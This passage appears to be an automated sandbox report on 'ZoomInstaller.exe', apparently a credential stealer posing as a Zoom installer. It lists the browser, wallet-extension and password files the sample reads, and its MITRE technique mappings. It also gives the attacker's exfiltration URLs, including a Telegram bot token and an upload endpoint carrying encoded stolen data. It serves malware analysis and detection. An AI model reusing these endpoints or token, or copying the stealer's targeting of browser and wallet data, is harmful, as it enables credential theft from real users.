    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpnJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mdjmfdffdcmnoblignmgpommbefadffdJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\djclckkglechooblngghdinmeemkbgciJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\history.dbJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\akoiaibnepcedcplijmiamnaigbepmcbJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
    Source: Yara matchFile source: Process Memory Space: ZoomInstaller.exe PID: 7284, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation    		1
    DLL Side-Loading    		11
    Process Injection    		1
    Masquerading    		1
    OS Credential Dumping    		1
    Query Registry    		Remote Services11
    Input Capture    		1
    Web Service    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts12
    Command and Scripting Interpreter    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		1
    Modify Registry    		11
    Input Capture    		11
    Security Software Discovery    		Remote Desktop Protocol21
    Data from Local System    		11
    Encrypted Channel    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)21
    Virtualization/Sandbox Evasion    		Security Account Manager2
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared Drive1
    Ingress Tool Transfer    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
    Process Injection    		NTDS21
    Virtualization/Sandbox Evasion    		Distributed Component Object ModelInput Capture3
    Non-Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Obfuscated Files or Information    		LSA Secrets1
    Application Window Discovery    		SSHKeylogging4
    Application Layer Protocol    		Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Install Root Certificate    		Cached Domain Credentials1
    File and Directory Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading    		DCSync13
    System Information Discovery    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1544493 Sample: ZoomInstaller.exe Startdate: 29/10/2024 Architecture: WINDOWS Score: 76 43 api.telegram.org 2->43 45 manestvli.shop 2->45 47 api.myip.com 2->47 55 Suricata IDS alerts for network traffic 2->55 57 Machine Learning detection for sample 2->57 59 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 2->59 61 AI detected suspicious sample 2->61 8 ZoomInstaller.exe 25 2->8         started        signatures3 63 Uses the Telegram API (likely for C&C communication) 43->63 process4 dnsIp5 49 api.telegram.org 149.154.167.220, 443, 49738 TELEGRAMRU United Kingdom 8->49 51 manestvli.shop 188.114.97.3, 443, 49737 CLOUDFLARENETUS European Union 8->51 53 api.myip.com 104.26.9.59, 443, 49730 CLOUDFLARENETUS United States 8->53 35 C:\Users\user\AppData\Local\...\history.db, SQLite 8->35 dropped 37 C:\Users\user\AppData\Local\...\webdata.db, SQLite 8->37 dropped 39 C:\Users\user\AppData\Local\...\passwords.db, SQLite 8->39 dropped 41 5 other malicious files 8->41 dropped 65 Installs new ROOT certificates 8->65 67 Tries to harvest and steal browser information (history, passwords, etc) 8->67 69 Detected generic credential text file 8->69 13 powershell.exe 15 8->13         started        15 powershell.exe 15 8->15         started        17 powershell.exe 11 8->17         started        19 6 other processes 8->19 file6 signatures7 process8 process9 21 conhost.exe 13->21         started        23 conhost.exe 15->23         started        25 conhost.exe 17->25         started        27 conhost.exe 19->27         started        29 conhost.exe 19->29         started        31 conhost.exe 19->31         started        33 3 other processes 19->33

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    ZoomInstaller.exe0%ReversingLabs
    ZoomInstaller.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
    http://nuget.org/NuGet.exe0%URL Reputationsafe
    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
    https://go.micro0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
    https://www.ecosia.org/newtab/0%URL Reputationsafe
    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://nuget.org/nuget.exe0%URL Reputationsafe
    https://oneget.orgX0%URL Reputationsafe
    https://aka.ms/pscore680%URL Reputationsafe
    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
    https://oneget.org0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    api.myip.com
    		104.26.9.59
    		truefalse
      		unknown
      manestvli.shop
      		188.114.97.3
      		truetrue
        		unknown
        api.telegram.org
        		149.154.167.220
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://api.myip.com/false
            		unknown
            https://api.telegram.org/bot7576282251:AAG0mg-rIFL8SDgfm15Nk4l51UZeLB-cEwU/sendMessagefalse
              		unknown
              https://manestvli.shop/upload.php?data=bDkyQVpaZGp1YXE2bU0raWZhUFJtWUNJaGQxN3phMmRsWGljcThhdG1KK1drTGVaZ3AxOTMzKzRqMldDaGJTYXJxbXRwNWQ4cTJaOG5ubVpmOTFxcllLRnRLYXYwTGl1Z0tQRnFYeWRxOCtXcktLcmpvU3NaNnZSbEtlTmJLeW1sbVp0MDVhbmVJeVZpSmljeEpuSHNYMTlwNmQ4ZW5iZmxOMTNySUYwbDZpdTBLaHNnWDJ6WVh5ZHE4K1ZxM3l1bDJUSHA4WFR0YkY5bzlHWmdIZDkyWHZSaEtxV1k5ZWh2TDZ3b0lPaXE2bUJoMzNaZTlGOFpaaDRuSjdEdmR1cWw3S3JabnllZWM5K3A0Q2VqWW10bk1YZnJHMTlvNk9aZjNkKzA1TzdycUNYcXF4bnE5QzRvSUI4ckpxVlo0cmJscXlBYVgyYjBwcTR2WmlubUlDNG0zeDZncGFMdklpZ2w2cXNwS3ZVeDUrV2dOcWNsM2Q5bkh2T2U1MkFkSzJndzc2eFo1WnNyR1Y4bnFQUGdhZUFiUT09&hash=2d6441c1bfc749b0344ftrue
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://duckduckgo.com/chrome_newtabZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drfalse
                • URL Reputation: safe
                		unknown
                http://nuget.org/NuGet.exepowershell.exe, 0000000F.00000002.1834759671.0000025648BB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1815118814.000002563A346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1834759671.0000025648A74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1922620665.000001406E384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FD40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000000F.00000002.1815118814.000002563A0FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FA0A000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  https://api.myip.comZoomInstaller.exe, 00000000.00000002.1975879577.000000C000102000.00000004.00001000.00020000.00000000.sdmpfalse
                    		unknown
                    https://duckduckgo.com/ac/?q=ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drfalse
                      		unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.1863827318.000001405FBCA000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.1863827318.000001405FBCA000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        https://go.micropowershell.exe, 0000000F.00000002.1815118814.0000025639633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405EF42000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Licensepowershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://manestvli.shop/upload.php?ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00032A000.00000004.00001000.00020000.00000000.sdmpfalse
                          		unknown
                          https://contoso.com/Iconpowershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000212000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0000BE000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000208000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0000FC000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C00054A000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C000552000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000049000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C00054E000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000080000.00000004.00001000.00020000.00000000.sdmp, history.db.0.dr, Google-Default.txt.0.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000212000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C000500000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0000BE000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000208000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C000552000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C00054E000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000080000.00000004.00001000.00020000.00000000.sdmp, history.db.0.dr, Google-Default.txt.0.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.org/bot%s/sendMessageZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002D0000.00000004.00001000.00020000.00000000.sdmpfalse
                            		unknown
                            https://manestvli.shop/upload.php?C:ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00032A000.00000004.00001000.00020000.00000000.sdmpfalse
                              		unknown
                              https://www.ecosia.org/newtab/ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.1863827318.000001405FBCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://ac.ecosia.org/autocomplete?q=ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://manestvli.shop/upload.php?data=bDkyQVpaZGp1YXE2bU0raWZhUFJtWUNJaGQxN3phMmRsWGljcThhdG1KK1drTZoomInstaller.exe, 00000000.00000002.1975879577.000000C000212000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://api.telegram.org/bot%s/sendMessagehttps://api.telegram.org/bot%s/sendMessagechat_id=68432125ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallZoomInstaller.exe, 00000000.00000002.1982764110.000000C000500000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1942189720.000002976C803000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1942109309.000002976C803000.00000004.00000020.00020000.00000000.sdmp, history.db.0.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://ailurophilestealer.com/botZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://contoso.com/powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://nuget.org/nuget.exepowershell.exe, 0000000F.00000002.1834759671.0000025648BB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1815118814.000002563A346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1834759671.0000025648A74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1922620665.000001406E384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FD40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://oneget.orgXpowershell.exe, 0000000F.00000002.1815118814.000002563A0FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FA0A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://aka.ms/pscore68powershell.exe, 0000000F.00000002.1815118814.0000025638A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405E311000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016========ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0000FC000.00000004.00001000.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesZoomInstaller.exe, 00000000.00000003.1942189720.000002976C803000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1942109309.000002976C803000.00000004.00000020.00020000.00000000.sdmp, history.db.0.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000F.00000002.1815118814.0000025638A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405E311000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://oneget.orgpowershell.exe, 0000000F.00000002.1815118814.000002563A0FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FA0A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://ailurophilestealer.comZoomInstaller.exe, 00000000.00000002.1975879577.000000C000364000.00000004.00001000.00020000.00000000.sdmp, info.txt.0.drfalse
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          149.154.167.220
                                          		api.telegram.orgUnited Kingdom
                                          		62041TELEGRAMRUtrue
                                          104.26.9.59
                                          		api.myip.comUnited States
                                          		13335CLOUDFLARENETUSfalse
                                          188.114.97.3
                                          		manestvli.shopEuropean Union
                                          		13335CLOUDFLARENETUStrue

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1544493
                                          Start date and time:2024-10-29 14:02:11 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 5m 30s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:22
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:ZoomInstaller.exe
                                          Detection:MAL
                                          Classification:mal76.troj.spyw.evad.winEXE@28/27@3/3
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 2
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Stop behavior analysis, all processes terminated

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • VT rate limit hit for: ZoomInstaller.exe

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          09:03:06API Interceptor3x Sleep call for process: WMIC.exe modified
                                          09:03:12API Interceptor16x Sleep call for process: powershell.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          149.154.167.220Documentos.exeGet hashmaliciousSnake KeyloggerBrowse
                                            ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                              rShippingDocuments240384.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                M2AB8BeHc4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    swift-copy31072024PDF.htmlGet hashmaliciousHTMLPhisherBrowse
                                                      Fedex.exeGet hashmaliciousAgentTeslaBrowse
                                                        come.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                          Fa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            AWB#21138700102.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                              104.26.9.59file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC StealerBrowse
                                                                eSLlhErJ0q.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                  iBO7gzlZr3.exeGet hashmaliciousLummaCBrowse
                                                                    5zFCjSBLvw.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                      FySc2FzpA8.exeGet hashmaliciousGo InjectorBrowse
                                                                        setup.exeGet hashmaliciousLummaC, Mars Stealer, PureLog Stealer, RedLine, Stealc, Stealerium, VidarBrowse
                                                                          1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                                                                            SecuriteInfo.com.Trojan.Siggen28.55231.10056.8041.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, SystemBC, Vidar, zgRATBrowse
                                                                              SecuriteInfo.com.Win64.DropperX-gen.20168.7257.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Stealc, Vidar, zgRATBrowse
                                                                                SecuriteInfo.com.Win64.DropperX-gen.29167.15583.exeGet hashmaliciousPureLog StealerBrowse
                                                                                  188.114.97.3rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.launchdreamidea.xyz/2b9b/
                                                                                  rPO_28102400.exeGet hashmaliciousLokibotBrowse
                                                                                  • ghcopz.shop/ClarkB/PWS/fre.php
                                                                                  PbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                  • windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
                                                                                  SR3JZpolPo.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                                  5Z1WFRMTOXRH6X21Z8NU8.exeGet hashmaliciousUnknownBrowse
                                                                                  • artvisions-autoinsider.com/8bkjdSdfjCe/index.php
                                                                                  PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.cc101.pro/4hfb/
                                                                                  QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • filetransfer.io/data-package/cDXpxO66/download
                                                                                  Instruction_1928.pdf.lnk.download.lnkGet hashmaliciousLummaCBrowse
                                                                                  • tech-tribune.shop/pLQvfD4d5/index.php
                                                                                  WBCDZ4Z3M2667YBDZ5K4.bin.exeGet hashmaliciousUnknownBrowse
                                                                                  • tech-tribune.shop/pLQvfD4d5/index.php
                                                                                  yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                                  • www.rs-ag.com/

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  api.myip.comfile.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC StealerBrowse
                                                                                  • 104.26.9.59
                                                                                  gHPYUEh253.exeGet hashmaliciousDjvu, Neoreklami, Stealc, Vidar, XmrigBrowse
                                                                                  • 104.26.8.59
